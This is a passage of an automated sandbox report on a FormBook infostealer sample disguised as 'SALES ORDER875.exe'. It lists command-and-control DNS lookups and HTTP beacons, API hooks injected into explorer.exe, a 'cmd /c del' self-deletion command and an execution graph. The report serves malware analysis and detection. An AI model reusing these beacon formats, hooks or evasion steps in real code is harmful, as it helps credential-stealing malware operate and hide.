                                                                                                                                                                                  Nov 1, 2024 14:09:31.874373913 CET53605301.1.1.1192.168.2.4
                                                                                                                                                                                  Nov 1, 2024 14:10:13.400392056 CET5593853192.168.2.41.1.1.1
                                                                                                                                                                                  Nov 1, 2024 14:10:13.410598993 CET53559381.1.1.1192.168.2.4
                                                                                                                                                                                  Nov 1, 2024 14:10:34.537101030 CET4938453192.168.2.41.1.1.1
                                                                                                                                                                                  Nov 1, 2024 14:10:34.546467066 CET53493841.1.1.1192.168.2.4
                                                                                                                                                                                  Nov 1, 2024 14:10:55.636576891 CET5346953192.168.2.41.1.1.1
                                                                                                                                                                                  Nov 1, 2024 14:10:55.660073042 CET53534691.1.1.1192.168.2.4
                                                                                                                                                                                  Nov 1, 2024 14:11:17.481321096 CET6072253192.168.2.41.1.1.1
                                                                                                                                                                                  Nov 1, 2024 14:11:17.508454084 CET53607221.1.1.1192.168.2.4
                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                  Nov 1, 2024 14:07:48.181421041 CET192.168.2.41.1.1.10xd17fStandard query (0)www.lasterdeals.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 1, 2024 14:08:09.571980000 CET192.168.2.41.1.1.10xc47aStandard query (0)www.rkgexg.topA (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 1, 2024 14:08:28.602884054 CET192.168.2.41.1.1.10xec6aStandard query (0)www.ocockbowerlybrawer.cfdA (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 1, 2024 14:08:49.446813107 CET192.168.2.41.1.1.10x1a3bStandard query (0)www.ool-covers76.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 1, 2024 14:09:10.967401981 CET192.168.2.41.1.1.10x5800Standard query (0)www.9net88.netA (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 1, 2024 14:09:31.856239080 CET192.168.2.41.1.1.10xa0bStandard query (0)www.yegle.netA (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 1, 2024 14:10:13.400392056 CET192.168.2.41.1.1.10xf92eStandard query (0)www.iscinddocenaemlynne.cfdA (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 1, 2024 14:10:34.537101030 CET192.168.2.41.1.1.10x91feStandard query (0)www.zoc-marriage.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 1, 2024 14:10:55.636576891 CET192.168.2.41.1.1.10x4c0dStandard query (0)www.ivglass.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 1, 2024 14:11:17.481321096 CET192.168.2.41.1.1.10x1db5Standard query (0)www.pm-22-ns-2.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                  Nov 1, 2024 14:07:48.193178892 CET1.1.1.1192.168.2.40xd17fName error (3)www.lasterdeals.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 1, 2024 14:08:09.660111904 CET1.1.1.1192.168.2.40xc47aName error (3)www.rkgexg.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 1, 2024 14:08:28.613985062 CET1.1.1.1192.168.2.40xec6aName error (3)www.ocockbowerlybrawer.cfdnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 1, 2024 14:08:49.455573082 CET1.1.1.1192.168.2.40x1a3bName error (3)www.ool-covers76.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 1, 2024 14:09:11.169971943 CET1.1.1.1192.168.2.40x5800No error (0)www.9net88.net94950.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 1, 2024 14:09:11.169971943 CET1.1.1.1192.168.2.40x5800No error (0)94950.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 1, 2024 14:09:31.874373913 CET1.1.1.1192.168.2.40xa0bNo error (0)www.yegle.netyegle.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 1, 2024 14:09:31.874373913 CET1.1.1.1192.168.2.40xa0bNo error (0)yegle.net216.239.32.52A (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 1, 2024 14:09:31.874373913 CET1.1.1.1192.168.2.40xa0bNo error (0)yegle.net216.239.34.52A (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 1, 2024 14:10:13.410598993 CET1.1.1.1192.168.2.40xf92eName error (3)www.iscinddocenaemlynne.cfdnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 1, 2024 14:10:34.546467066 CET1.1.1.1192.168.2.40x91feName error (3)www.zoc-marriage.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 1, 2024 14:10:55.660073042 CET1.1.1.1192.168.2.40x4c0dName error (3)www.ivglass.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 1, 2024 14:11:17.508454084 CET1.1.1.1192.168.2.40x1db5Name error (3)www.pm-22-ns-2.clicknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                  • www.9net88.net
                                                                                                                                                                                  • www.yegle.net
                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  0192.168.2.450002199.59.243.227802580C:\Windows\explorer.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Nov 1, 2024 14:09:11.200793028 CET165OUTGET /ge07/?AZFdK=5jGt1VUhS4spDnR&bb=rInKjcPO3O96ojanc4NFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22tP8faITl6ID HTTP/1.1
                                                                                                                                                                                  Host: www.9net88.net
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                  Data Ascii:


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  1192.168.2.450003216.239.32.52802580C:\Windows\explorer.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Nov 1, 2024 14:09:31.898746014 CET164OUTGET /ge07/?bb=jzpSmAmxAHuMrBYVYK/iobfyuTkKVe1DkRFizLdS8mEnIcKQ83L44yYAyf2Gtg0WJqSR&AZFdK=5jGt1VUhS4spDnR HTTP/1.1
                                                                                                                                                                                  Host: www.yegle.net
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                  Data Ascii:


                                                                                                                                                                                  Code Manipulations

                                                                                                                                                                                  Function NameHook TypeActive in Processes
                                                                                                                                                                                  PeekMessageAINLINEexplorer.exe
                                                                                                                                                                                  PeekMessageWINLINEexplorer.exe
                                                                                                                                                                                  GetMessageWINLINEexplorer.exe
                                                                                                                                                                                  GetMessageAINLINEexplorer.exe
                                                                                                                                                                                  Function NameHook TypeNew Data
                                                                                                                                                                                  PeekMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE9
                                                                                                                                                                                  PeekMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE9
                                                                                                                                                                                  GetMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE9
                                                                                                                                                                                  GetMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE9

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                  Start time:09:06:53
                                                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                                                  Path:C:\Users\user\Desktop\SALES ORDER875.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\SALES ORDER875.exe"
                                                                                                                                                                                  Imagebase:0x380000
                                                                                                                                                                                  File size:1'396'736 bytes
                                                                                                                                                                                  MD5 hash:6AC24DF0D8B58005679910E42981DBE8
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                  Start time:09:07:10
                                                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\SALES ORDER875.exe"
                                                                                                                                                                                  Imagebase:0x8a0000
                                                                                                                                                                                  File size:46'504 bytes
                                                                                                                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                  Start time:09:07:11
                                                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                  Imagebase:0x7ff72b770000
                                                                                                                                                                                  File size:5'141'208 bytes
                                                                                                                                                                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000003.00000002.4140986795.000000000E678000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                  Start time:09:07:14
                                                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Windows\SysWOW64\netsh.exe"
                                                                                                                                                                                  Imagebase:0x1560000
                                                                                                                                                                                  File size:82'432 bytes
                                                                                                                                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                  Start time:09:07:18
                                                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:/c del "C:\Windows\SysWOW64\svchost.exe"
                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                  Start time:09:07:18
                                                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Reset < >

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:2.9%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:2%
                                                                                                                                                                                    Signature Coverage:5.1%
                                                                                                                                                                                    Total number of Nodes:1711
                                                                                                                                                                                    Total number of Limit Nodes:65
                                                                                                                                                                                    execution_graph 94888 381098 94893 3842de 94888->94893 94892 3810a7 94914 38a961 94893->94914 94897 384342 94912 384378 94897->94912 94931 3893b2 94897->94931 94899 38436c 94935 3837a0 94899->94935 94900 38441b GetCurrentProcess IsWow64Process 94902 384437 94900->94902 94903 38444f LoadLibraryA 94902->94903 94904 3c3824 GetSystemInfo 94902->94904 94905 38449c GetSystemInfo 94903->94905 94906 384460 GetProcAddress 94903->94906 94908 384476 94905->94908 94906->94905 94907 384470 GetNativeSystemInfo 94906->94907 94907->94908 94910 38447a FreeLibrary 94908->94910 94911 38109d 94908->94911 94909 3c37df 94910->94911 94913 3a00a3 29 API calls __onexit 94911->94913 94912->94900 94912->94909 94913->94892 94939 39fe0b 94914->94939 94916 38a976 94949 39fddb 94916->94949 94918 3842f5 GetVersionExW 94919 386b57 94918->94919 94920 3c4ba1 94919->94920 94921 386b67 _wcslen 94919->94921 94922 3893b2 22 API calls 94920->94922 94924 386b7d 94921->94924 94925 386ba2 94921->94925 94923 3c4baa 94922->94923 94923->94923 94974 386f34 22 API calls 94924->94974 94926 39fddb 22 API calls 94925->94926 94928 386bae 94926->94928 94930 39fe0b 22 API calls 94928->94930 94929 386b85 __fread_nolock 94929->94897 94930->94929 94932 3893c9 __fread_nolock 94931->94932 94933 3893c0 94931->94933 94932->94899 94933->94932 94975 38aec9 94933->94975 94936 3837ae 94935->94936 94937 3893b2 22 API calls 94936->94937 94938 3837c2 94937->94938 94938->94912 94941 39fddb 94939->94941 94942 39fdfa 94941->94942 94944 39fdfc 94941->94944 94959 3aea0c 94941->94959 94966 3a4ead 7 API calls 2 library calls 94941->94966 94942->94916 94948 3a066d 94944->94948 94967 3a32a4 RaiseException 94944->94967 94946 3a068a 94946->94916 94968 3a32a4 RaiseException 94948->94968 94952 39fde0 94949->94952 94950 3aea0c ___std_exception_copy 21 API calls 94950->94952 94951 39fdfa 94951->94918 94952->94950 94952->94951 94955 39fdfc 94952->94955 94971 3a4ead 7 API calls 2 library calls 94952->94971 94954 3a066d 94973 3a32a4 RaiseException 94954->94973 94955->94954 94972 3a32a4 RaiseException 94955->94972 94957 3a068a 94957->94918 94964 3b3820 _abort 94959->94964 94960 3b385e 94970 3af2d9 20 API calls _abort 94960->94970 94961 3b3849 RtlAllocateHeap 94963 3b385c 94961->94963 94961->94964 94963->94941 94964->94960 94964->94961 94969 3a4ead 7 API calls 2 library calls 94964->94969 94966->94941 94967->94948 94968->94946 94969->94964 94970->94963 94971->94952 94972->94954 94973->94957 94974->94929 94976 38aed9 __fread_nolock 94975->94976 94977 38aedc 94975->94977 94976->94932 94978 39fddb 22 API calls 94977->94978 94979 38aee7 94978->94979 94980 39fe0b 22 API calls 94979->94980 94980->94976 94981 3a03fb 94982 3a0407 ___scrt_is_nonwritable_in_current_image 94981->94982 95010 39feb1 94982->95010 94984 3a040e 94985 3a0561 94984->94985 94988 3a0438 94984->94988 95037 3a083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 94985->95037 94987 3a0568 95038 3a4e52 28 API calls _abort 94987->95038 94999 3a0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 94988->94999 95021 3b247d 94988->95021 94990 3a056e 95039 3a4e04 28 API calls _abort 94990->95039 94994 3a0576 94995 3a0457 94997 3a04d8 95029 3a0959 94997->95029 94999->94997 95033 3a4e1a 38 API calls 2 library calls 94999->95033 95001 3a04de 95002 3a04f3 95001->95002 95034 3a0992 GetModuleHandleW 95002->95034 95004 3a04fa 95004->94987 95005 3a04fe 95004->95005 95006 3a0507 95005->95006 95035 3a4df5 28 API calls _abort 95005->95035 95036 3a0040 13 API calls 2 library calls 95006->95036 95009 3a050f 95009->94995 95011 39feba 95010->95011 95040 3a0698 IsProcessorFeaturePresent 95011->95040 95013 39fec6 95041 3a2c94 10 API calls 3 library calls 95013->95041 95015 39fecb 95020 39fecf 95015->95020 95042 3b2317 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 95015->95042 95017 39fed8 95018 39fee6 95017->95018 95043 3a2cbd 8 API calls 3 library calls 95017->95043 95018->94984 95020->94984 95022 3b2494 95021->95022 95044 3a0a8c 95022->95044 95024 3a0451 95024->94995 95025 3b2421 95024->95025 95028 3b2450 95025->95028 95026 3a0a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 95027 3b2479 95026->95027 95027->94999 95028->95026 95052 3a2340 95029->95052 95032 3a097f 95032->95001 95033->94997 95034->95004 95035->95006 95036->95009 95037->94987 95038->94990 95039->94994 95040->95013 95041->95015 95042->95017 95043->95020 95045 3a0a97 IsProcessorFeaturePresent 95044->95045 95046 3a0a95 95044->95046 95048 3a0c5d 95045->95048 95046->95024 95051 3a0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 95048->95051 95050 3a0d40 95050->95024 95051->95050 95053 3a096c GetStartupInfoW 95052->95053 95053->95032 95054 1a9068b 95057 1a90300 95054->95057 95056 1a906d7 95070 1a8dd30 95057->95070 95060 1a903d0 CreateFileW 95062 1a903dd 95060->95062 95067 1a9039f 95060->95067 95061 1a903f9 VirtualAlloc 95061->95062 95063 1a9041a ReadFile 95061->95063 95064 1a905fa 95062->95064 95065 1a905ec VirtualFree 95062->95065 95063->95062 95066 1a90438 VirtualAlloc 95063->95066 95064->95056 95065->95064 95066->95062 95066->95067 95067->95061 95067->95062 95068 1a90500 CloseHandle 95067->95068 95069 1a90510 VirtualFree 95067->95069 95073 1a91210 GetPEB 95067->95073 95068->95067 95069->95067 95075 1a911b0 GetPEB 95070->95075 95072 1a8e3bb 95072->95067 95074 1a9123a 95073->95074 95074->95060 95076 1a911da 95075->95076 95076->95072 95077 38105b 95082 38344d 95077->95082 95079 38106a 95113 3a00a3 29 API calls __onexit 95079->95113 95081 381074 95083 38345d __wsopen_s 95082->95083 95084 38a961 22 API calls 95083->95084 95085 383513 95084->95085 95114 383a5a 95085->95114 95087 38351c 95121 383357 95087->95121 95094 38a961 22 API calls 95095 38354d 95094->95095 95142 38a6c3 95095->95142 95098 3c3176 RegQueryValueExW 95099 3c320c RegCloseKey 95098->95099 95100 3c3193 95098->95100 95103 383578 95099->95103 95112 3c321e _wcslen 95099->95112 95101 39fe0b 22 API calls 95100->95101 95102 3c31ac 95101->95102 95148 385722 95102->95148 95103->95079 95104 384c6d 22 API calls 95104->95112 95107 3c31d4 95108 386b57 22 API calls 95107->95108 95109 3c31ee messages 95108->95109 95109->95099 95111 38515f 22 API calls 95111->95112 95112->95103 95112->95104 95112->95111 95151 389cb3 95112->95151 95113->95081 95157 3c1f50 95114->95157 95117 389cb3 22 API calls 95118 383a8d 95117->95118 95159 383aa2 95118->95159 95120 383a97 95120->95087 95122 3c1f50 __wsopen_s 95121->95122 95123 383364 GetFullPathNameW 95122->95123 95124 383386 95123->95124 95125 386b57 22 API calls 95124->95125 95126 3833a4 95125->95126 95127 3833c6 95126->95127 95128 3833dd 95127->95128 95129 3c30bb 95127->95129 95169 3833ee 95128->95169 95131 39fddb 22 API calls 95129->95131 95133 3c30c5 _wcslen 95131->95133 95132 3833e8 95136 38515f 95132->95136 95134 39fe0b 22 API calls 95133->95134 95135 3c30fe __fread_nolock 95134->95135 95138 38516e 95136->95138 95141 38518f __fread_nolock 95136->95141 95137 39fddb 22 API calls 95140 383544 95137->95140 95139 39fe0b 22 API calls 95138->95139 95139->95141 95140->95094 95141->95137 95143 38a6dd 95142->95143 95144 383556 RegOpenKeyExW 95142->95144 95145 39fddb 22 API calls 95143->95145 95144->95098 95144->95103 95146 38a6e7 95145->95146 95147 39fe0b 22 API calls 95146->95147 95147->95144 95149 39fddb 22 API calls 95148->95149 95150 385734 RegQueryValueExW 95149->95150 95150->95107 95150->95109 95152 389cc2 _wcslen 95151->95152 95153 39fe0b 22 API calls 95152->95153 95154 389cea __fread_nolock 95153->95154 95155 39fddb 22 API calls 95154->95155 95156 389d00 95155->95156 95156->95112 95158 383a67 GetModuleFileNameW 95157->95158 95158->95117 95160 3c1f50 __wsopen_s 95159->95160 95161 383aaf GetFullPathNameW 95160->95161 95162 383ae9 95161->95162 95163 383ace 95161->95163 95165 38a6c3 22 API calls 95162->95165 95164 386b57 22 API calls 95163->95164 95166 383ada 95164->95166 95165->95166 95167 3837a0 22 API calls 95166->95167 95168 383ae6 95167->95168 95168->95120 95170 3833fe _wcslen 95169->95170 95171 3c311d 95170->95171 95172 383411 95170->95172 95174 39fddb 22 API calls 95171->95174 95179 38a587 95172->95179 95176 3c3127 95174->95176 95175 38341e __fread_nolock 95175->95132 95177 39fe0b 22 API calls 95176->95177 95178 3c3157 __fread_nolock 95177->95178 95180 38a59d 95179->95180 95183 38a598 __fread_nolock 95179->95183 95181 39fe0b 22 API calls 95180->95181 95182 3cf80f 95180->95182 95181->95183 95183->95175 95184 38dddc 95187 38b710 95184->95187 95186 38ddea 95188 38b72b 95187->95188 95189 3d00f8 95188->95189 95190 3d0146 95188->95190 95198 38b750 95188->95198 95193 3d0102 95189->95193 95196 3d010f 95189->95196 95189->95198 95254 4058a2 208 API calls 2 library calls 95190->95254 95252 405d33 208 API calls 95193->95252 95215 38ba20 95196->95215 95253 4061d0 208 API calls 2 library calls 95196->95253 95202 38bbe0 40 API calls 95198->95202 95203 39d336 40 API calls 95198->95203 95206 38ba4e 95198->95206 95207 3d0322 95198->95207 95211 38bbd0 95198->95211 95198->95215 95219 38ec40 95198->95219 95243 38a81b 41 API calls 95198->95243 95244 39d2f0 40 API calls 95198->95244 95245 39a01b 208 API calls 95198->95245 95246 3a0242 5 API calls __Init_thread_wait 95198->95246 95247 39edcd 22 API calls 95198->95247 95248 3a00a3 29 API calls __onexit 95198->95248 95249 3a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95198->95249 95250 39ee53 82 API calls 95198->95250 95251 39e5ca 208 API calls 95198->95251 95255 38aceb 23 API calls messages 